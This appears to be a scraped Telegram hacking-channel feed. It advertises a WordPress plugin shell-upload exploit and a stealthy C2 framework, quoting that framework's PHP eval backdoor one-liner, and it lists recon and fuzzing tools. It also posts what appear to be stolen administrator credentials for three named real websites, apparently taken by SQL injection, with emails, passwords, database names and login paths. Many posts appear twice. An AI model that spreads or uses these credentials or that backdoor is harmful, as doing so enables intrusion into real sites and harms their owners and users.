WordPress_Yith_WooCommerce_Gift_Cards_Premium_3_19_0_Shell_Upload.txt
4.2 KB
WordPress Yith WooCommerce Gift Cards Premium 3.19.0 Shell Upload Vulnerability
#CVE #Web_Applications #Php
Please open Telegram to view this post
VIEW IN TELEGRAM
👍1
Full-featured C2 framework which silently persists on
webserver via polymorphic PHP oneliner
Overview
The obfuscated communication is accomplished using HTTP headers under standard client requests and web server's relative responses, tunneled through a tiny polymorphic backdoor:
Efficient: More than 20 plugins to automate privilege-escalation tasks
Stealth: The framework is made by paranoids, for paranoids
Convenient: A robust interface with many crucial features
Supported platforms (as attacker):
#RedTeam #Web_Hacking #HackTool
➖➖➖➖➖➖➖➖➖➖
👤 t.iss.one/MRvirusIRBOT
📢 t.iss.one/BugCod3
webserver via polymorphic PHP oneliner
Overview
The obfuscated communication is accomplished using HTTP headers under standard client requests and web server's relative responses, tunneled through a tiny polymorphic backdoor:
<?php @eval($_SERVER['HTTP_PHPSPL01T']); ?>Features
Efficient: More than 20 plugins to automate privilege-escalation tasks
Stealth: The framework is made by paranoids, for paranoids
Convenient: A robust interface with many crucial features
Supported platforms (as attacker):
GNU/LinuxSupported platforms (as target):
Mac OS X
GNU/LinuxGitHub
BSD-like
Mac OS X
Windows NT
#RedTeam #Web_Hacking #HackTool
➖➖➖➖➖➖➖➖➖➖
👤 t.iss.one/MRvirusIRBOT
📢 t.iss.one/BugCod3
🤯1
ffuf - Fuzz Faster U Fool
A fast web fuzzer written in Go.
Installation
Download a prebuilt binary from releases page, unpack and run!
or
If you are on macOS with homebrew, ffuf can be installed with:
If you have recent go compiler installed:
or
GitHub
#Web #InfoSec #Fuzzer
➖➖➖➖➖➖➖➖➖➖
👤 t.iss.one/MRvirusIRBOT
📢 t.iss.one/BugCod3
A fast web fuzzer written in Go.
Installation
Download a prebuilt binary from releases page, unpack and run!
or
If you are on macOS with homebrew, ffuf can be installed with:
brew install ffufor
If you have recent go compiler installed:
go install github.com/ffuf/ffuf/v2@latest(the same command works for updating)
or
git clone https://github.com/ffuf/ffuf ; cd ffuf ; go get ; go buildFfuf depends on Go 1.16 or greater.
GitHub
#Web #InfoSec #Fuzzer
➖➖➖➖➖➖➖➖➖➖
👤 t.iss.one/MRvirusIRBOT
📢 t.iss.one/BugCod3
⚡2
Gobuster
Gobuster is a tool used to brute-force:
⚪️ URIs (directories and files) in web sites.
⚪️ DNS subdomains (with wildcard support).
⚪️ Virtual Host names on target web servers.
⚪️ Open Amazon S3 buckets
⚪️ Open Google Cloud buckets
⚪️ TFTP servers
GitHub
⬇️ Download
🔒
#Go #Dns #Web #Pentesting #Tools
➖➖➖➖➖➖➖➖➖➖
👤 t.iss.one/MRvirusIRBOT
📢 t.iss.one/BugCod3
Gobuster is a tool used to brute-force:
⚪️ URIs (directories and files) in web sites.
⚪️ DNS subdomains (with wildcard support).
⚪️ Virtual Host names on target web servers.
⚪️ Open Amazon S3 buckets
⚪️ Open Google Cloud buckets
⚪️ TFTP servers
GitHub
⬇️ Download
🔒
BugCod3#Go #Dns #Web #Pentesting #Tools
➖➖➖➖➖➖➖➖➖➖
👤 t.iss.one/MRvirusIRBOT
📢 t.iss.one/BugCod3
👍3
FinalRecon is an automatic web reconnaissance tool written in python. Goal of FinalRecon is to provide an overview of the target in a short amount of time while maintaining the accuracy of results. Instead of executing several tools one after another it can provide similar results keeping dependencies small and simple.
FinalRecon provides detailed information such as :
⚪️ Header Information
⚪️ Whois
⚪️ SSL Certificate Information
⚪️ Crawler
...
⚪️ DNS Enumeration
...
⚪️ Subdomain Enumeration
...
⚪️ Directory Searching
...
⚪️ Wayback Machine
...
⚪️ Port Scan
...
⚪️ Export
...
Github
#pentesting #web #Tools
➖➖➖➖➖➖➖➖➖➖
👤 t.iss.one/MRvirusIRBOT
📢 t.iss.one/BugCod3
FinalRecon provides detailed information such as :
⚪️ Header Information
⚪️ Whois
⚪️ SSL Certificate Information
⚪️ Crawler
...
⚪️ DNS Enumeration
...
⚪️ Subdomain Enumeration
...
⚪️ Directory Searching
...
⚪️ Wayback Machine
...
⚪️ Port Scan
...
⚪️ Export
...
Github
#pentesting #web #Tools
➖➖➖➖➖➖➖➖➖➖
👤 t.iss.one/MRvirusIRBOT
📢 t.iss.one/BugCod3
⚡3
🌐 https://www.ntbcl.com
👤 name: Admin
📧 email: [email protected]
🔓 password: NewP30MAY@$#
🚫 login page: N/A
#web #sql
➖➖➖➖➖➖➖➖➖➖
👤 t.iss.one/MRvirusIRBOT
📢 t.iss.one/BugCod3
👤 name: Admin
📧 email: [email protected]
🔓 password: NewP30MAY@$#
🚫 login page: N/A
#web #sql
➖➖➖➖➖➖➖➖➖➖
👤 t.iss.one/MRvirusIRBOT
📢 t.iss.one/BugCod3
🌐 aeronsindia.com
👤 Name: Admin
📧 Email: [email protected]
🔓 Password: admin12345
📧 Email: [email protected]
🔓 Password: 123
🆚 Version: 5.6.51
🗂 Database: aeronsin_web
🚫 login page: N/A
#web #sql
➖➖➖➖➖➖➖➖➖➖
👤 t.iss.one/MRvirusIRBOT
📢 t.iss.one/BugCod3
👤 Name: Admin
📧 Email: [email protected]
🔓 Password: admin12345
📧 Email: [email protected]
🔓 Password: 123
🆚 Version: 5.6.51
🗂 Database: aeronsin_web
🚫 login page: N/A
#web #sql
➖➖➖➖➖➖➖➖➖➖
👤 t.iss.one/MRvirusIRBOT
📢 t.iss.one/BugCod3
🌐 https://www.simscollege.ac.in
👤 Username: admin
🔓 Password: simsxyz
🆚 Version: 10.5.22-MariaDB
🚫 Database: N/A
✅ login page: /members.php
#web #sql
➖➖➖➖➖➖➖➖➖➖
👤 t.iss.one/MRvirusIRBOT
📢 t.iss.one/BugCod3
👤 Username: admin
🔓 Password: simsxyz
🆚 Version: 10.5.22-MariaDB
🚫 Database: N/A
✅ login page: /members.php
#web #sql
➖➖➖➖➖➖➖➖➖➖
👤 t.iss.one/MRvirusIRBOT
📢 t.iss.one/BugCod3
#Deep #Web
Please open Telegram to view this post
VIEW IN TELEGRAM